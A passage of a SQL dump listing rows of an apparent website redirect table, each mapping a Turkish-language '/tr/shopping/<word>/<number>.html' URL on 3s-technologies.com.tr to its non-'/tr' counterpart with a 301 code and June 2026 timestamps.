00:00:00',301),(78919,'https://3s-technologies.com.tr/tr/shopping/cloudlessly/1046687911.html',NULL,'https://3s-technologies.com.tr/shopping/cloudlessly/1046687911.html','',1,0,'2026-06-11 22:03:43','0000-00-00 00:00:00',301),(78920,'https://3s-technologies.com.tr/tr/shopping/spirometry/1651476009.html',NULL,'https://3s-technologies.com.tr/shopping/spirometry/1651476009.html','',1,0,'2026-06-11 22:03:46','0000-00-00 00:00:00',301),(78921,'https://3s-technologies.com.tr/tr/shopping/indigested/1721354429.html',NULL,'https://3s-technologies.com.tr/shopping/indigested/1721354429.html','',1,0,'2026-06-11 22:03:49','0000-00-00 00:00:00',301),(78922,'https://3s-technologies.com.tr/tr/shopping/overaffect/566040366.html',NULL,'https://3s-technologies.com.tr/shopping/overaffect/566040366.html','',1,0,'2026-06-11 22:03:53','0000-00-00 00:00:00',301),(78923,'https://3s-technologies.com.tr/tr/shopping/decursive/4238670452.html',NULL,'https://3s-technologies.com.tr/shopping/decursive/4238670452.html','',1,0,'2026-06-11 22:03:55','0000-00-00 00:00:00',301),(78924,'https://3s-technologies.com.tr/tr/shopping/effusing/1623567773.html',NULL,'https://3s-technologies.com.tr/shopping/effusing/1623567773.html','',1,0,'2026-06-11 22:03:58','0000-00-00 00:00:00',301),(78925,'https://3s-technologies.com.tr/tr/shopping/polytechnics/394861185.html',NULL,'https://3s-technologies.com.tr/shopping/polytechnics/394861185.html','',1,0,'2026-06-11 22:04:01','0000-00-00 00:00:00',301),(78926,'https://3s-technologies.com.tr/tr/shopping/deviltry/281617704.html',NULL,'https://3s-technologies.com.tr/shopping/deviltry/281617704.html','',1,0,'2026-06-11 22:04:04','0000-00-00 00:00:00',301),(78927,'https://3s-technologies.com.tr/tr/shopping/eloignment/3614592117.html',NULL,'https://3s-technologies.com.tr/shopping/eloignment/3614592117.html','',1,0,'2026-06-11 22:04:07','0000-00-00 00:00:00',301),(78928,'https://3s-technologies.com.tr/tr/shopping/misrate/1069236719.html',NULL,'https://3s-technologies.com.tr/shopping/misrate/1069236719.html','',1,0,'2026-06-11 22:04:13','0000-00-00 00:00:00',301),(78929,'https://3s-technologies.com.tr/tr/shopping/drouthy/2968081691.html',NULL,'https://3s-technologies.com.tr/shopping/drouthy/2968081691.html','',1,0,'2026-06-11 22:04:16','0000-00-00 00:00:00',301),(78930,'https://3s-technologies.com.tr/tr/shopping/gladded/2010899335.html',NULL,'https://3s-technologies.com.tr/shopping/gladded/2010899335.html','',1,0,'2026-06-11 22:04:19','0000-00-00 00:00:00',301),(78931,'https://3s-technologies.com.tr/tr/shopping/resolution/522491241.html',NULL,'https://3s-technologies.com.tr/shopping/resolution/522491241.html','',1,0,'2026-06-11 22:04:22','0000-00-00 00:00:00',301),(78932,'https://3s-technologies.com.tr/tr/shopping/tonsil/2533355997.html',NULL,'https://3s-technologies.com.tr/shopping/tonsil/2533355997.html','',1,0,'2026-06-11 22:04:25','0000-00-00 00:00:00',301),(78933,'https://3s-technologies.com.tr/tr/shopping/methodize/2716621351.html',NULL,'https://3s-technologies.com.tr/shopping/methodize/2716621351.html','',1,0,'2026-06-11 22:04:41','0000-00-00 00:00:00',301),(78934,'https://3s-technologies.com.tr/tr/shopping/buttonhole/538739263.html',NULL,'https://3s-technologies.com.tr/shopping/buttonhole/538739263.html','',1,0,'2026-06-11 22:04:44','0000-00-00 00:00:00',301),(78935,'https://3s-technologies.com.tr/tr/shopping/collimation/1828089219.html',NULL,'https://3s-technologies.com.tr/shopping/collimation/1828089219.html','',1,0,'2026-06-11 22:04:47','0000-00-00 00:00:00',301),(78936,'https://3s-technologies.com.tr/tr/shopping/teamwork/2039367129.html',NULL,'https://3s-technologies.com.tr/shopping/teamwork/2039367129.html','',1,0,'2026-06-11 22:04:49','0000-00-00 00:00:00',301),(78937,'https://3s-technologies.com.tr/tr/shopping/nullify/1596451746.html',NULL,'https://3s-technologies.com.tr/shopping/nullify/1596451746.html','',1,0,'2026-06-11 22:04:53','0000-00-00 00:00:00',301),(78938,'https://3s-technologies.com.tr/tr/shopping/actable/1273900903.html',NULL,'https://3s-technologies.com.tr/shopping/actable/1273900903.html','',1,0,'2026-06-11 22:04:56','0000-00-00 00:00:00',301),(78939,'https://3s-technologies.com.tr/tr/shopping/polyps/3837832455.html',NULL,'https://3s-technologies.com.tr/shopping/polyps/3837832455.html','',1,0,'2026-06-11 22:04:59','0000-00-00 00:00:00',301),(78940,'https://3s-technologies.com.tr/tr/shopping/quack/2019242535.html',NULL,'https://3s-technologies.com.tr/shopping/quack/2019242535.html','',1,0,'2026-06-11 22:05:02','0000-00-00 00:00:00',301),(78941,'https://3s-technologies.com.tr/tr/shopping/whether/3959498117.html',NULL,'https://3s-technologies.com.tr/shopping/whether/3959498117.html','',1,0,'2026-06-11 22:05:05','0000-00-00 00:00:00',301),(78942,'https://3s-technologies.com.tr/tr/shopping/tapper/1848984485.html',NULL,'https://3s-technologies.com.tr/shopping/tapper/1848984485.html','',1,0,'2026-06-11 22:05:07','0000-00-00 00:00:00',301),(78943,'https://3s-technologies.com.tr/tr/shopping/kickback/402116675.html',NULL,'https://3s-technologies.com.tr/shopping/kickback/402116675.html','',1,0,'2026-06-11 22:05:11','0000-00-00 00:00:00',301),(78944,'https://3s-technologies.com.tr/tr/shopping/vildly/3090959452.html',NULL,'https://3s-technologies.com.tr/shopping/vildly/3090959452.html','',1,0,'2026-06-11 22:05:14','0000-00-00 00:00:00',301),(78945,'https://3s-technologies.com.tr/tr/shopping/yellowlegged/751620006.html',NULL,'https://3s-technologies.com.tr/shopping/yellowlegged/751620006.html','',1,0,'2026-06-11 22:05:17','0000-00-00 00:00:00',301),(78946,'https://3s-technologies.com.tr/tr/shopping/continuedly/2062850116.html',NULL,'https://3s-technologies.com.tr/shopping/continuedly/2062850116.html','',1,0,'2026-06-11 22:05:20','0000-00-00 00:00:00',301),(78947,'https://3s-technologies.com.tr/tr/shopping/fawkner/1251352127.html',NULL,'https://3s-technologies.com.tr/shopping/fawkner/1251352127.html','',1,0,'2026-06-11 22:05:23','0000-00-00 00:00:00',301),(78948,'https://3s-technologies.com.tr/tr/shopping/generalizable/905339082.html',NULL,'https://3s-technologies.com.tr/shopping/generalizable/905339082.html','',1,0,'2026-06-11 22:05:26','0000-00-00 00:00:00',301),(78949,'https://3s-technologies.com.tr/tr/shopping/tocsin/2492342206.html',NULL,'https://3s-technologies.com.tr/shopping/tocsin/2492342206.html','',1,0,'2026-06-11 22:05:31','0000-00-00 00:00:00',301),(78950,'https://3s-technologies.com.tr/tr/shopping/intermixedly/98429865.html',NULL,'https://3s-technologies.com.tr/shopping/intermixedly/98429865.html','',1,0,'2026-06-11 22:05:35','0000-00-00 00:00:00',301),(78951,'https://3s-technologies.com.tr/tr/shopping/pairing/1715553526.html',NULL,'https://3s-technologies.com.tr/shopping/pairing/1715553526.html','',1,0,'2026-06-11 22:05:38','0000-00-00 00:00:00',301),(78952,'https://3s-technologies.com.tr/tr/shopping/extractive/47410280.html',NULL,'https://3s-technologies.com.tr/shopping/extractive/47410280.html','',1,0,'2026-06-11 22:05:41','0000-00-00 00:00:00',301),(78953,'https://3s-technologies.com.tr/tr/shopping/underpuller/3748244846.html',NULL,'https://3s-technologies.com.tr/shopping/underpuller/3748244846.html','',1,0,'2026-06-11 22:05:44','0000-00-00 00:00:00',301),(78954,'https://3s-technologies.com.tr/tr/shopping/concomitant/208510841.html',NULL,'https://3s-technologies.com.tr/shopping/concomitant/208510841.html','',1,0,'2026-06-11 22:05:47','0000-00-00 00:00:00',301),(78955,'https://3s-technologies.com.tr/tr/shopping/calendulin/2906874337.html',NULL,'https://3s-technologies.com.tr/shopping/calendulin/2906874337.html','',1,0,'2026-06-11 22:05:50','0000-00-00 00:00:00',301),(78956,'https://3s-technologies.com.tr/tr/shopping/coldly/568377022.html',NULL,'https://3s-technologies.com.tr/shopping/coldly/568377022.html','',1,0,'2026-06-11 22:05:53','0000-00-00 00:00:00',301),(78957,'https://3s-technologies.com.tr/tr/shopping/edacious/267467564.html',NULL,'https://3s-technologies.com.tr/shopping/edacious/267467564.html','',1,0,'2026-06-11 22:05:56','0000-00-00 00:00:00',301),(78958,'https://3s-technologies.com.tr/tr/shopping/delegates/3270532531.html',NULL,'https://3s-technologies.com.tr/shopping/delegates/3270532531.html','',1,0,'2026-06-11 22:06:00','0000-00-00 00:00:00',301),(78959,'https://3s-technologies.com.tr/tr/shopping/imaginal/1200776952.html',NULL,'https://3s-technologies.com.tr/shopping/imaginal/1200776952.html','',1,0,'2026-06-11 22:06:04','0000-00-00 00:00:00',301),(78960,'https://3s-technologies.com.tr/tr/shopping/gratulate/1576768563.html',NULL,'https://3s-technologies.com.tr/shopping/gratulate/1576768563.html','',1,0,'2026-06-11 22:06:06','0000-00-00 00:00:00',301),(78961,'https://3s-technologies.com.tr/tr/shopping/sinewless/3265943759.html',NULL,'https://3s-technologies.com.tr/shopping/sinewless/3265943759.html','',1,0,'2026-06-11 22:06:09','0000-00-00 00:00:00',301),(78962,'https://3s-technologies.com.tr/tr/shopping/goodlooking/256526599.html',NULL,'https://3s-technologies.com.tr/shopping/goodlooking/256526599.html','',1,0,'2026-06-11 22:06:12','0000-00-00 00:00:00',301),(78963,'https://3s-technologies.com.tr/tr/shopping/overlayer/1590487320.html',NULL,'https://3s-technologies.com.tr/shopping/overlayer/1590487320.html','',1,0,'2026-06-11 22:06:15','0000-00-00 00:00:00',301),(78964,'https://3s-technologies.com.tr/tr/shopping/puler/3483576829.html',NULL,'https://3s-technologies.com.tr/shopping/puler/3483576829.html','',1,0,'2026-06-11 22:06:18','0000-00-00 00:00:00',301),(78965,'https://3s-technologies.com.tr/tr/shopping/overworking/3371466466.html',NULL,'https://3s-technologies.com.tr/shopping/overworking/3371466466.html','',1,0,'2026-06-11 22:06:21','0000-00-00 00:00:00',301),(78966,'https://3s-technologies.com.tr/tr/shopping/hulling/2821539108.html',NULL,'https://3s-technologies.com.tr/shopping/hulling/2821539108.html','',1,0,'2026-06-11 22:06:24','0000-00-00 00:00:00',301),(78967,'https://3s-technologies.com.tr/tr/shopping/interknit/2731552223.html',NULL,'https://3s-technologies.com.tr/shopping/interknit/2731552223.html','',1,0,'2026-06-11 22:06:27','0000-00-00 00:00:00',301),(78968,'https://3s-technologies.com.tr/tr/shopping/chesty/1514808045.html',NULL,'https://3s-technologies.com.tr/shopping/chesty/1514808045.html','',1,0,'2026-06-11 22:06:31','0000-00-00 00:00:00',301),(78969,'https://3s-technologies.com.tr/tr/shopping/affectionated/2198815645.html',NULL,'https://3s-technologies.com.tr/shopping/affectionated/2198815645.html','',1,0,'2026-06-11 22:06:33','0000-00-00 00:00:00',301),(78970,'https://3s-technologies.com.tr/tr/shopping/comeddle/382944588.html',NULL,'https://3s-technologies.com.tr/shopping/comeddle/382944588.html','',1,0,'2026-06-11 22:06:36','0000-00-00 00:00:00',301),(78971,'https://3s-technologies.com.tr/tr/shopping/interdome/1324866828.html',NULL,'https://3s-technologies.com.tr/shopping/interdome/1324866828.html','',1,0,'2026-06-11 22:06:39','0000-00-00 00:00:00',301),(78972,'https://3s-technologies.com.tr/tr/shopping/continuative/2323069012.html',NULL,'https://3s-technologies.com.tr/shopping/continuative/2323069012.html','',1,0,'2026-06-11 22:06:42','0000-00-00 00:00:00',301),(78973,'https://3s-technologies.com.tr/tr/shopping/rostrate/1322279091.html',NULL,'https://3s-technologies.com.tr/shopping/rostrate/1322279091.html','',1,0,'2026-06-11 22:06:45','0000-00-00 00:00:00',301),(78974,'https://3s-technologies.com.tr/tr/shopping/plunging/562404053.html',NULL,'https://3s-technologies.com.tr/shopping/plunging/562404053.html','',1,0,'2026-06-11 22:06:48','0000-00-00 00:00:00',301),(78975,'https://3s-technologies.com.tr/tr/shopping/abbatical/302512970.html',NULL,'https://3s-technologies.com.tr/shopping/abbatical/302512970.html','',1,0,'2026-06-11 22:06:51','0000-00-00 00:00:00',301),(78976,'https://3s-technologies.com.tr/tr/shopping/seron/970237964.html',NULL,'https://3s-technologies.com.tr/shopping/seron/970237964.html','',1,0,'2026-06-11 22:06:54','0000-00-00 00:00:00',301),(78977,'https://3s-technologies.com.tr/tr/shopping/bursten/1787465394.html',NULL,'https://3s-technologies.com.tr/shopping/bursten/1787465394.html','',1,0,'2026-06-11 22:06:57','0000-00-00 00:00:00',301),(78978,'https://3s-technologies.com.tr/tr/shopping/pyrophyllite/3152267413.html',NULL,'https://3s-technologies.com.tr/shopping/pyrophyllite/3152267413.html','',1,0,'2026-06-11 22:07:00','0000-00-00 00:00:00',301),(78979,'https://3s-technologies.com.tr/tr/shopping/melilot/1991986840.html',NULL,'https://3s-technologies.com.tr/shopping/melilot/1991986840.html','',1,0,'2026-06-11 22:07:05','0000-00-00 00:00:00',301),(78980,'https://3s-technologies.com.tr/tr/shopping/dentiform/1378982183.html',NULL,'https://3s-technologies.com.tr/shopping/dentiform/1378982183.html','',1,0,'2026-06-11 22:07:10','0000-00-00 00:00:00',301),(78981,'https://3s-technologies.com.tr/tr/shopping/eloignate/1788677477.html',NULL,'https://3s-technologies.com.tr/shopping/eloignate/1788677477.html','',1,0,'2026-06-11 22:07:12','0000-00-00 00:00:00',301),(78982,'https://3s-technologies.com.tr/tr/shopping/dolomization/1181864457.html',NULL,'https://3s-technologies.com.tr/shopping/dolomization/1181864457.html','',1,0,'2026-06-11 22:07:16','0000-00-00 00:00:00',301),(78983,'https://3s-technologies.com.tr/tr/shopping/shatterbrained/334402877.html',NULL,'https://3s-technologies.com.tr/shopping/shatterbrained/334402877.html','',1,0,'2026-06-11 22:07:18','0000-00-00 00:00:00',301),(78984,'https://3s-technologies.com.tr/tr/shopping/relented/2351764049.html',NULL,'https://3s-technologies.com.tr/shopping/relented/2351764049.html','',1,0,'2026-06-11 22:07:22','0000-00-00 00:00:00',301),(78985,'https://3s-technologies.com.tr/tr/shopping/coshering/323849679.html',NULL,'https://3s-technologies.com.tr/shopping/coshering/323849679.html','',1,0,'2026-06-11 22:07:24','0000-00-00 00:00:00',301),(78986,'https://3s-technologies.com.tr/tr/shopping/quiddling/3758612952.html',NULL,'https://3s-technologies.com.tr/shopping/quiddling/3758612952.html','',1,0,'2026-06-11 22:07:28','0000-00-00 00:00:00',301),(78987,'https://3s-technologies.com.tr/tr/shopping/beslabber/95053176.html',NULL,'https://3s-technologies.com.tr/shopping/beslabber/95053176.html','',1,0,'2026-06-11 22:07:30','0000-00-00 00:00:00',301),(78988,'https://3s-technologies.com.tr/tr/shopping/annexing/1920896353.html',NULL,'https://3s-technologies.com.tr/shopping/annexing/1920896353.html','',1,0,'2026-06-11 22:07:33','0000-00-00 00:00:00',301),(78989,'https://3s-technologies.com.tr/tr/shopping/speedfully/3790666382.html',NULL,'https://3s-technologies.com.tr/shopping/speedfully/3790666382.html','',1,0,'2026-06-11 22:07:37','0000-00-00 00:00:00',301),(78990,'https://3s-technologies.com.tr/tr/shopping/collet/1774699112.html',NULL,'https://3s-technologies.com.tr/shopping/collet/1774699112.html','',1,0,'2026-06-11 22:07:40','0000-00-00 00:00:00',301),(78991,'https://3s-technologies.com.tr/tr/shopping/whitleather/1824549023.html',NULL,'https://3s-technologies.com.tr/shopping/whitleather/1824549023.html','',1,0,'2026-06-11 22:07:43','0000-00-00 00:00:00',301),(78992,'https://3s-technologies.com.tr/tr/shopping/willower/1397894678.html',NULL,'https://3s-technologies.com.tr/shopping/willower/1397894678.html','',1,0,'2026-06-11 22:07:46','0000-00-00 00:00:00',301),(78993,'https://3s-technologies.com.tr/tr/shopping/toting/920269954.html',NULL,'https://3s-technologies.com.tr/shopping/toting/920269954.html','',1,0,'2026-06-11 22:07:49','0000-00-00 00:00:00',301),(78994,'https://3s-technologies.com.tr/tr/shopping/crith/3927262884.html',NULL,'https://3s-technologies.com.tr/shopping/crith/3927262884.html','',1,0,'2026-06-11 22:07:55','0000-00-00 00:00:00',301),(78995,'https://3s-technologies.com.tr/tr/shopping/litraneter/3993601076.html',NULL,'https://3s-technologies.com.tr/shopping/litraneter/3993601076.html','',1,0,'2026-06-11 22:07:59','0000-00-00 00:00:00',301),(78996,'https://3s-technologies.com.tr/tr/shopping/underdone/262491025.html',NULL,'https://3s-technologies.com.tr/shopping/underdone/262491025.html','',1,0,'2026-06-11 22:08:02','0000-00-00 00:00:00',301),(78997,'https://3s-technologies.com.tr/tr/shopping/absentee/948737732.html',NULL,'https://3s-technologies.com.tr/shopping/absentee/948737732.html','',1,0,'2026-06-11 22:08:05','0000-00-00 00:00:00',301),(78998,'https://3s-technologies.com.tr/tr/shopping/lustra/960673465.html',NULL,'https://3s-technologies.com.tr/shopping/lustra/960673465.html','',1,0,'2026-06-11 22:08:08','0000-00-00 00:00:00',301),(78999,'https://3s-technologies.com.tr/tr/shopping/disasterly/1836922559.html',NULL,'https://3s-technologies.com.tr/shopping/disasterly/1836922559.html','',1,0,'2026-06-11 22:08:11','0000-00-00 00:00:00',301),(79000,'https://3s-technologies.com.tr/tr/shopping/disaffectedly/4249747363.html',NULL,'https://3s-technologies.com.tr/shopping/disaffectedly/4249747363.html','',1,0,'2026-06-11 22:08:15','0000-00-00 00:00:00',301),(79001,'https://3s-technologies.com.tr/tr/shopping/padus/3580583629.html',NULL,'https://3s-technologies.com.tr/shopping/padus/3580583629.html','',1,0,'2026-06-11 22:08:18','0000-00-00 00:00:00',301),(79002,'https://3s-technologies.com.tr/tr/shopping/cyclic/1715426227.html',NULL,'https://3s-technologies.com.tr/shopping/cyclic/1715426227.html','',1,0,'2026-06-11 22:08:20','0000-00-00 00:00:00',301),(79003,'https://3s-technologies.com.tr/tr/shopping/sphericalness/2734869051.html',NULL,'https://3s-technologies.com.tr/shopping/sphericalness/2734869051.html','',1,0,'2026-06-11 22:08:23','0000-00-00 00:00:00',301),(79004,'https://3s-technologies.com.tr/tr/shopping/electicism/702029719.html',NULL,'https://3s-technologies.com.tr/shopping/electicism/702029719.html','',1,0,'2026-06-11 22:08:26','0000-00-00 00:00:00',301),(79005,'https://3s-technologies.com.tr/tr/shopping/preconsent/561228194.html',NULL,'https://3s-technologies.com.tr/shopping/preconsent/561228194.html','',1,0,'2026-06-11 22:08:29','0000-00-00 00:00:00',301),(79006,'https://3s-technologies.com.tr/tr/shopping/untimely/4202139847.html',NULL,'https://3s-technologies.com.tr/shopping/untimely/4202139847.html','',1,0,'2026-06-11 22:08:32','0000-00-00 00:00:00',301),(79007,'https://3s-technologies.com.tr/tr/shopping/cryptobranchiate/2666956532.html',NULL,'https://3s-technologies.com.tr/shopping/cryptobranchiate/2666956532.html','',1,0,'2026-06-11 22:08:40','0000-00-00 00:00:00',301),(79008,'https://3s-technologies.com.tr/tr/shopping/rhapsodizing/3822121759.html',NULL,'https://3s-technologies.com.tr/shopping/rhapsodizing/3822121759.html','',1,0,'2026-06-11 22:08:45','0000-00-00 00:00:00',301),(79009,'https://3s-technologies.com.tr/tr/shopping/eunomy/1474786068.html',NULL,'https://3s-technologies.com.tr/shopping/eunomy/1474786068.html','',1,0,'2026-06-11 22:08:48','0000-00-00 00:00:00',301),(79010,'https://3s-technologies.com.tr/tr/shopping/impounder/1745010035.html',NULL,'https://3s-technologies.com.tr/shopping/impounder/1745010035.html','',1,0,'2026-06-11 22:08:51','0000-00-00 00:00:00',301),(79011,'https://3s-technologies.com.tr/tr/shopping/solacing/1278871257.html',NULL,'https://3s-technologies.com.tr/shopping/solacing/1278871257.html','',1,0,'2026-06-11 22:08:54','0000-00-00 00:00:00',301),(79012,'https://3s-technologies.com.tr/tr/shopping/sepium/2265093960.html',NULL,'https://3s-technologies.com.tr/shopping/sepium/2265093960.html','',1,0,'2026-06-11 22:08:57','0000-00-00 00:00:00',301),(79013,'https://3s-technologies.com.tr/tr/shopping/angiospermatous/753984343.html',NULL,'https://3s-technologies.com.tr/shopping/angiospermatous/753984343.html','',1,0,'2026-06-11 22:09:00','0000-00-00 00:00:00',301),(79014,'https://3s-technologies.com.tr/tr/shopping/resignation/774716086.html',NULL,'https://3s-technologies.com.tr/shopping/resignation/774716086.html','',1,0,'2026-06-11 22:09:03','0000-00-00 00:00:00',301),(79015,'https://3s-technologies.com.tr/tr/shopping/teache/2464859268.html',NULL,'https://3s-technologies.com.tr/shopping/teache/2464859268.html','',1,0,'2026-06-11 22:09:06','0000-00-00 00:00:00',301),(79016,'https://3s-technologies.com.tr/tr/shopping/brokenbacked/3883477343.html',NULL,'https://3s-technologies.com.tr/shopping/brokenbacked/3883477343.html','',1,0,'2026-06-11 22:09:09','0000-00-00 00:00:00',301),(79017,'https://3s-technologies.com.tr/tr/shopping/zamia/1143009187.html',NULL,'https://3s-technologies.com.tr/shopping/zamia/1143009187.html','',1,0,'2026-06-11 22:09:16','0000-00-00 00:00:00',301),(79018,'https://3s-technologies.com.tr/tr/shopping/skyed/3785914055.html',NULL,'https://3s-technologies.com.tr/shopping/skyed/3785914055.html','',1,0,'2026-06-11 22:09:18','0000-00-00 00:00:00',301),(79019,'https://3s-technologies.com.tr/tr/shopping/juiced/2416662899.html',NULL,'https://3s-technologies.com.tr/shopping/juiced/2416662899.html','',1,0,'2026-06-11 22:09:22','0000-00-00 00:00:00',301),(79020,'https://3s-technologies.com.tr/tr/shopping/farabout/1281422770.html',NULL,'https://3s-technologies.com.tr/shopping/farabout/1281422770.html','',1,0,'2026-06-11 22:09:24','0000-00-00 00:00:00',301),(79021,'https://3s-technologies.com.tr/tr/shopping/divinize/3522597821.html',NULL,'https://3s-technologies.com.tr/shopping/divinize/3522597821.html','',1,0,'2026-06-11 22:09:27','0000-00-00 00:00:00',301),(79022,'https://3s-technologies.com.tr/tr/shopping/lightheartedness/1323654713.html',NULL,'https://3s-technologies.com.tr/shopping/lightheartedness/1323654713.html','',1,0,'2026-06-11 22:09:30','0000-00-00 00:00:00',301),(79023,'https://3s-technologies.com.tr/tr/shopping/claves/357296995.html',NULL,'https://3s-technologies.com.tr/shopping/claves/357296995.html','',1,0,'2026-06-11 22:09:33','0000-00-00 00:00:00',301),(79024,'https://3s-technologies.com.tr/tr/shopping/trouncing/2051084819.html',NULL,'https://3s-technologies.com.tr/shopping/trouncing/2051084819.html','',1,0,'2026-06-11 22:09:36','0000-00-00 00:00:00',301),(79025,'https://3s-technologies.com.tr/tr/shopping/permute/2156583670.html',NULL,'https://3s-technologies.com.tr/shopping/permute/2156583670.html','',1,0,'2026-06-11 22:09:39','0000-00-00 00:00:00',301),(79026,'https://3s-technologies.com.tr/tr/shopping/morsel/138615349.html',NULL,'https://3s-technologies.com.tr/shopping/morsel/138615349.html','',1,0,'2026-06-11 22:09:42','0000-00-00 00:00:00',301),(79027,'https://3s-technologies.com.tr/tr/shopping/fortuitousness/1667011815.html',NULL,'https://3s-technologies.com.tr/shopping/fortuitousness/1667011815.html','',1,0,'2026-06-11 22:09:45','0000-00-00 00:00:00',301),(79028,'https://3s-technologies.com.tr/tr/shopping/confoundedness/2567794270.html',NULL,'https://3s-technologies.com.tr/shopping/confoundedness/2567794270.html','',1,0,'2026-06-11 22:09:49','0000-00-00 00:00:00',301),(79029,'https://3s-technologies.com.tr/tr/shopping/collodiotype/360837207.html',NULL,'https://3s-technologies.com.tr/shopping/collodiotype/360837207.html','',1,0,'2026-06-11 22:09:53','0000-00-00 00:00:00',301),(79030,'https://3s-technologies.com.tr/tr/shopping/ordurous/1552844149.html',NULL,'https://3s-technologies.com.tr/shopping/ordurous/1552844149.html','',1,0,'2026-06-11 22:09:58','0000-00-00 00:00:00',301),(79031,'https://3s-technologies.com.tr/tr/shopping/obvert/1628156561.html',NULL,'https://3s-technologies.com.tr/shopping/obvert/1628156561.html','',1,0,'2026-06-11 22:10:00','0000-00-00 00:00:00',301),(79032,'https://3s-technologies.com.tr/tr/shopping/democracy/1967455293.html',NULL,'https://3s-technologies.com.tr/shopping/democracy/1967455293.html','',1,0,'2026-06-11 22:10:03','0000-00-00 00:00:00',301),(79033,'https://3s-technologies.com.tr/tr/shopping/pated/67752073.html',NULL,'https://3s-technologies.com.tr/shopping/pated/67752073.html','',1,0,'2026-06-11 22:10:06','0000-00-00 00:00:00',301),(79034,'https://3s-technologies.com.tr/tr/shopping/cleistogamousa/708601294.html',NULL,'https://3s-technologies.com.tr/shopping/cleistogamousa/708601294.html','',1,0,'2026-06-11 22:10:09','0000-00-00 00:00:00',301),(79035,'https://3s-technologies.com.tr/tr/shopping/lowermost/3056527248.html',NULL,'https://3s-technologies.com.tr/shopping/lowermost/3056527248.html','',1,0,'2026-06-11 22:10:12','0000-00-00 00:00:00',301),(79036,'https://3s-technologies.com.tr/tr/shopping/stewpot/19373901.html',NULL,'https://3s-technologies.com.tr/shopping/stewpot/19373901.html','',1,0,'2026-06-11 22:10:15','0000-00-00 00:00:00',301),(79037,'https://3s-technologies.com.tr/tr/shopping/reliable/3466828924.html',NULL,'https://3s-technologies.com.tr/shopping/reliable/3466828924.html','',1,0,'2026-06-11 22:10:18','0000-00-00 00:00:00',301),(79038,'https://3s-technologies.com.tr/tr/shopping/reapply/3028618980.html',NULL,'https://3s-technologies.com.tr/shopping/reapply/3028618980.html','',1,0,'2026-06-11 22:10:21','0000-00-00 00:00:00',301),(79039,'https://3s-technologies.com.tr/tr/shopping/distrainable/3444558020.html',NULL,'https://3s-technologies.com.tr/shopping/distrainable/3444558020.html','',1,0,'2026-06-11 22:10:24','0000-00-00 00:00:00',301),(79040,'https://3s-technologies.com.tr/tr/shopping/divident/1119127198.html',NULL,'https://3s-technologies.com.tr/shopping/divident/1119127198.html','',1,0,'2026-06-11 22:10:30','0000-00-00 00:00:00',301),(79041,'https://3s-technologies.com.tr/tr/shopping/hypochondriasis/1384747690.html',NULL,'https://3s-technologies.com.tr/shopping/hypochondriasis/1384747690.html','',1,0,'2026-06-11 22:10:34','0000-00-00 00:00:00',301),(79042,'https://3s-technologies.com.tr/tr/shopping/doubledyed/2101110480.html',NULL,'https://3s-technologies.com.tr/shopping/doubledyed/2101110480.html','',1,0,'2026-06-11 22:10:37','0000-00-00 00:00:00',301),(79043,'https://3s-technologies.com.tr/tr/shopping/quartersawing/836800920.html',NULL,'https://3s-technologies.com.tr/shopping/quartersawing/836800920.html','',1,0,'2026-06-11 22:10:40','0000-00-00 00:00:00',301),(79044,'https://3s-technologies.com.tr/tr/shopping/chromed/1863144685.html',NULL,'https://3s-technologies.com.tr/shopping/chromed/1863144685.html','',1,0,'2026-06-11 22:10:43','0000-00-00 00:00:00',301),(79045,'https://3s-technologies.com.tr/tr/shopping/quire/1063048925.html',NULL,'https://3s-technologies.com.tr/shopping/quire/1063048925.html','',1,0,'2026-06-11 22:10:46','0000-00-00 00:00:00',301),(79046,'https://3s-technologies.com.tr/tr/shopping/plasmodia/577594517.html',NULL,'https://3s-technologies.com.tr/shopping/plasmodia/577594517.html','',1,0,'2026-06-11 22:10:49','0000-00-00 00:00:00',301),(79047,'https://3s-technologies.com.tr/tr/shopping/desolated/1888235790.html',NULL,'https://3s-technologies.com.tr/shopping/desolated/1888235790.html','',1,0,'2026-06-11 22:10:53','0000-00-00 00:00:00',301),(79048,'https://3s-technologies.com.tr/tr/shopping/bullethead/1203201166.html',NULL,'https://3s-technologies.com.tr/shopping/bullethead/1203201166.html','',1,0,'2026-06-11 22:10:56','0000-00-00 00:00:00',301),(79049,'https://3s-technologies.com.tr/tr/shopping/resumptive/3988011319.html',NULL,'https://3s-technologies.com.tr/shopping/resumptive/3988011319.html','',1,0,'2026-06-11 22:10:59','0000-00-00 00:00:00',301),(79050,'https://3s-technologies.com.tr/tr/shopping/iriartea/62817943.html',NULL,'https://3s-technologies.com.tr/shopping/iriartea/62817943.html','',1,0,'2026-06-11 22:11:02','0000-00-00 00:00:00',301),(79051,'https://3s-technologies.com.tr/tr/shopping/melitose/2355304245.html',NULL,'https://3s-technologies.com.tr/shopping/melitose/2355304245.html','',1,0,'2026-06-11 22:11:04','0000-00-00 00:00:00',301),(79052,'https://3s-technologies.com.tr/tr/shopping/homeopathically/4218019921.html',NULL,'https://3s-technologies.com.tr/shopping/homeopathically/4218019921.html','',1,0,'2026-06-11 22:11:07','0000-00-00 00:00:00',301),(79053,'https://3s-technologies.com.tr/tr/shopping/bottlefeed/1550679559.html',NULL,'https://3s-technologies.com.tr/shopping/bottlefeed/1550679559.html','',1,0,'2026-06-11 22:11:10','0000-00-00 00:00:00',301),(79054,'https://3s-technologies.com.tr/tr/shopping/edentated/4273574602.html',NULL,'https://3s-technologies.com.tr/shopping/edentated/4273574602.html','',1,0,'2026-06-11 22:11:13','0000-00-00 00:00:00',301),(79055,'https://3s-technologies.com.tr/tr/shopping/pucrasia/1160969191.html',NULL,'https://3s-technologies.com.tr/shopping/pucrasia/1160969191.html','',1,0,'2026-06-11 22:11:16','0000-00-00 00:00:00',301),(79056,'https://3s-technologies.com.tr/tr/shopping/jointureless/803356603.html',NULL,'https://3s-technologies.com.tr/shopping/jointureless/803356603.html','',1,0,'2026-06-11 22:11:20','0000-00-00 00:00:00',301),(79057,'https://3s-technologies.com.tr/tr/shopping/groving/632542081.html',NULL,'https://3s-technologies.com.tr/shopping/groving/632542081.html','',1,0,'2026-06-11 22:11:23','0000-00-00 00:00:00',301),(79058,'https://3s-technologies.com.tr/tr/shopping/fibulare/106607359.html',NULL,'https://3s-technologies.com.tr/shopping/fibulare/106607359.html','',1,0,'2026-06-11 22:11:26','0000-00-00 00:00:00',301),(79059,'https://3s-technologies.com.tr/tr/shopping/crusted/1548255377.html',NULL,'https://3s-technologies.com.tr/shopping/crusted/1548255377.html','',1,0,'2026-06-11 22:11:29','0000-00-00 